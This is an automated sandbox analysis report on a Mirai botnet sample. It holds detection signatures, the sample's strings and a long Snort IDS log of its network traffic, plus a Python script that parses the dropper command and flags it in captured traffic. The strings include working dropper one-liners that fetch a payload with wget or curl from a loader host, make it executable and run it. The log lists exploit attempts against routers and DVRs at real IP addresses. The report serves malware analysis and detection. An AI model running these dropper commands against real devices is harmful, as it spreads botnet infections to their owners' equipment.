Analysis Report nT7K5GG5km

Overview

General Information

Sample Name: nT7K5GG5km
Analysis ID: 402069
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: nT7K5GG5km Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: nT7K5GG5km Virustotal: Detection: 65%
Source: nT7K5GG5km Metadefender: Detection: 51%
Source: nT7K5GG5km ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper
Source: nT7K5GG5km String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: nT7K5GG5km String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: nT7K5GG5km String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
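The dropper command above is a template: the bot fills the %s/%d specifiers at runtime with the loader host and port and pushes the result into a victim's shell over telnet or an exploited web interface. The following Python is an added example, not code from the report or from the sample: it splits the one-liner into its stages (writable-directory probes, download chain, exec-bit fallback, execution) and flags a filled-in copy in captured payloads. The regexes, the category names and the 192.0.2.10:80 loader address in the constructed capture are assumptions of this example; only the two template strings come from the report.

```python
import re

# Dropper one-liners as they appear in the sample's strings. The %s/%d format
# specifiers are filled in by the bot at runtime with the loader host and port.
DROPPER_TEMPLATE = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;"
    "chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'"
)
DROPPER_TEMPLATE_SH = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;"
    "chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);"
    "sh bin.sh %s;/bin/busybox echo -e '%s'"
)

# '>/dir/.x&&cd /dir' creates an empty marker file; if the redirect succeeds the
# filesystem is writable and the shell moves there. The probes run in sequence,
# so the last directory that accepts the write is where the payload lands.
WRITABLE_PROBE = re.compile(r">(/[^ ;&]+)/\.x&&cd \1")
# Download chain: each fetcher runs only if the previous one failed ('||').
FETCH = re.compile(r"(wget|curl -O|/bin/busybox wget) (http://[^ ;|]+)")
# 'cp /bin/ls ii;cat i>ii' borrows the exec bit of an existing binary when
# chmod is unavailable or fails on a stripped-down BusyBox firmware.
NOEXEC_FALLBACK = re.compile(r"cp /bin/ls ([\w.]+);cat ([\w.]+)>\1")
EXEC = re.compile(r";(\./[\w.]+|sh [\w.]+)")


def parse_dropper(cmd):
    """Break a Mirai-style dropper command into its stages."""
    fetches = FETCH.findall(cmd)
    execm = EXEC.search(cmd)
    return {
        "writable_dirs": WRITABLE_PROBE.findall(cmd),
        "fetchers": [f for f, _ in fetches],
        "urls": sorted({u for _, u in fetches}),
        "chmod_fallback": NOEXEC_FALLBACK.search(cmd) is not None,
        "exec": execm.group(1) if execm else None,
    }


def looks_like_dropper(text):
    """Heuristic for telnet/HTTP payload inspection: several writable-directory
    probes plus a download-and-run chain inside one command string."""
    probes = len(WRITABLE_PROBE.findall(text))
    fetch = FETCH.search(text) is not None
    run = "chmod 777" in text or NOEXEC_FALLBACK.search(text) is not None
    return probes >= 3 and fetch and run


# Constructed example of what a victim sees on the wire once the bot has filled
# in the template (192.0.2.10:80 is a documentation address, not from the report).
CAPTURED = DROPPER_TEMPLATE.replace("%s:%d", "192.0.2.10:80").replace("%s", "x")
# Constructed benign line: one fetch, no writable-directory probing.
BENIGN = "cd /tmp && wget http://192.0.2.10/update.tar.gz && tar xzf update.tar.gz"

if __name__ == "__main__":
    for k, v in parse_dropper(DROPPER_TEMPLATE).items():
        print(f"{k}: {v}")
    print("captured session flagged:", looks_like_dropper(CAPTURED))  # True
    print("benign update flagged:", looks_like_dropper(BENIGN))       # False
```

Running the parser on the first template lists seven probed directories (/var/run, /mnt, /usr, /dev, /dev/shm, /tmp, /var), three fetchers tried in order (wget, curl -O, /bin/busybox wget), a single URL path /i, and the cp /bin/ls exec-bit fallback before ./i; the second template differs only in fetching bin.sh and running it with sh. The detection heuristic keys on the probe-plus-fetch combination rather than on any one directory or fetcher, since those vary between Mirai variants.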
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/nT7K5GG5km (PID: 4623) Opens: /proc/net/route

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.83.225.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.115.244.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.113.97: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.93.0.20: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.233.76.116: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.197.142.165: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.92.49.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.188.107.95: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.200.50.12: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.219.171.130: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.71.24.101: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.73.64.16: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.115.11.153: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 74.199.108.177: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 112.30.4.77:29583 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.250.123.141: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 223.130.28.80:12685 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.207.84.233: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.165.138.163: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.175.33.108: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 160.9.43.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.65.145.128: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.254.146.23:1027 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.143.214:12658 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.166.181:34323 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.83.51.81: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.10.2.50: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.39.241.178: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.173.141: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:39516
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.111.81.230:80 -> 192.168.2.20:57484
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 155.4.82.118: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.2.62.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.7.29.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50636 -> 81.196.113.75:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 86.65.65.146: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.159.66.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.186.146.41: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.78.107.232: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.16.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.255.9: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 72.35.40.202: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.128.213: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 130.236.0.8: -> 192.168.2.20:
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.117.97:80 -> 192.168.2.20:36288
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.94.183.248: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.187.161.54: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.144.251.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.41.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.223.233.145: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.151.143.192: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.184.161.124: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 192.168.51.205: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.247.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.213.18.103: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.131.254.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.161.200.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.227.175.107: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.196.216.151: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 166.88.241.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.62.3.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 208.71.234.42: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.230.19.100: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.146.228.186: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.155.152: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.85.44.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.242.180.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.233.149.60: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.95.159.167: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.174.245.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:40704
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.125.79.34: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.243.30.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.47.216: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.252.81.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 164.82.21.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.97.57.196: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.46.148.51: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.21.227.159: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.44.57.192: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.81.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.197.4.212: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.118.110.204: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.126.117: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.210.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.106.133: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 175.45.105.154: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.211.255: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.51.232.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.179.241.64: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.214.192.245: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.129.90.38: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.193.95.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.33.116.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.152.110.224: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 64.189.20.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 119.225.210.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.1.99.120: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.142.94.93: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.102.211: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.162.58: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.249.224.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.16.47.151: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.35.88.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.27.78.110: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 27.32.160.214: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:41576
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.105.99.147: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.222.33.55: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.207.101.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.255.62.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 146.148.194.79: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.248.115: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.50.15: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:52540 -> 210.190.146.92:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.132.19:80 -> 192.168.2.20:37336
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37336 -> 49.44.132.19:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.254.52.37: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.227.22.112: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.234.240: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.189.49.186: -> 192.168.2.20:
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:50030 -> 104.238.100.85:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.179.24.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.230.135:80 -> 192.168.2.20:54640
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54640 -> 104.124.230.135:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53902 -> 179.40.62.87:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.45.237.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.42.41.132: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.141.11.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.77.0.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.176.236: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.137.124.219: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.252.214.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.135.53.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.89.220.27: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.225.53.145: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.56.18.66: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.96.148.68: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.238.183.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.88.217: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.35:46153 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:45320 -> 45.148.37.237:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.247.167.217: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36288 -> 184.86.117.97:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.199.65.32: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.23.231.85: -> 192.168.2.20:
